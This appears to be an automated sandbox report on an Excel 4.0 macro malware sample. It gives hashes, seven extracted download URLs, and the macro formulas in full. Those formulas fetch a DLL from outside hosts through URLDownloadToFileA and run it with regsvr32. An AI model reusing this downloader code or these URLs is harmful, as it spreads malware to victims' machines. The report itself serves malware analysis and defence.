General

  • Target

    ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088

  • Size

    27KB

  • Sample

    240909-1ls5mstenb

  • MD5

    75b137eec11e92890485413127c2a34b

  • SHA1

    ee5ad0c8f90e359b3620990047fb1d50ce9654a8

  • SHA256

    ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088

  • SHA512

    cce5d37bd796a09d9a15cdeb077795f03017d08dc7466beae68e291075bff2702740ea3a6403d1a5ae4efe4dd8414297d917ab481b2b0f8cce04a8c6ce7a6883

  • SSDEEP

    768:nCOv7JUnzEmD4ys2ewg4F32ByH3nFn1Kk8jI:CKdU4Y2JwZ/XFn4k8jI

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://henrysfreshroast.com/6cc4ts0bkrOlXq/

http://consejosdeorlando.com/wp-includes/jxTbRk2DgQOIOyokR/

http://blog.centerking.top/wp-includes/DBq5jx/

http://polarrefrigeracao.com.br/fontes/y7QpO/

http://filmsetserie.dx.am/img/ghCY9J5KD1J/

https://vagbharati.in/wp-admin/nYBb/

http://advogadogoiania.com.br/wp-includes/O9Az4/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/6cc4ts0bkrOlXq/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consejosdeorlando.com/wp-includes/jxTbRk2DgQOIOyokR/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blog.centerking.top/wp-includes/DBq5jx/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://polarrefrigeracao.com.br/fontes/y7QpO/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://filmsetserie.dx.am/img/ghCY9J5KD1J/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vagbharati.in/wp-admin/nYBb/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://advogadogoiania.com.br/wp-includes/O9Az4/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Targets

    • Target

      ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088

    • Size

      27KB

    • MD5

      75b137eec11e92890485413127c2a34b

    • SHA1

      ee5ad0c8f90e359b3620990047fb1d50ce9654a8

    • SHA256

      ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088

    • SHA512

      cce5d37bd796a09d9a15cdeb077795f03017d08dc7466beae68e291075bff2702740ea3a6403d1a5ae4efe4dd8414297d917ab481b2b0f8cce04a8c6ce7a6883

    • SSDEEP

      768:nCOv7JUnzEmD4ys2ewg4F32ByH3nFn1Kk8jI:CKdU4Y2JwZ/XFn4k8jI

    Score
    3/10

MITRE ATT&CK Enterprise v15

Tasks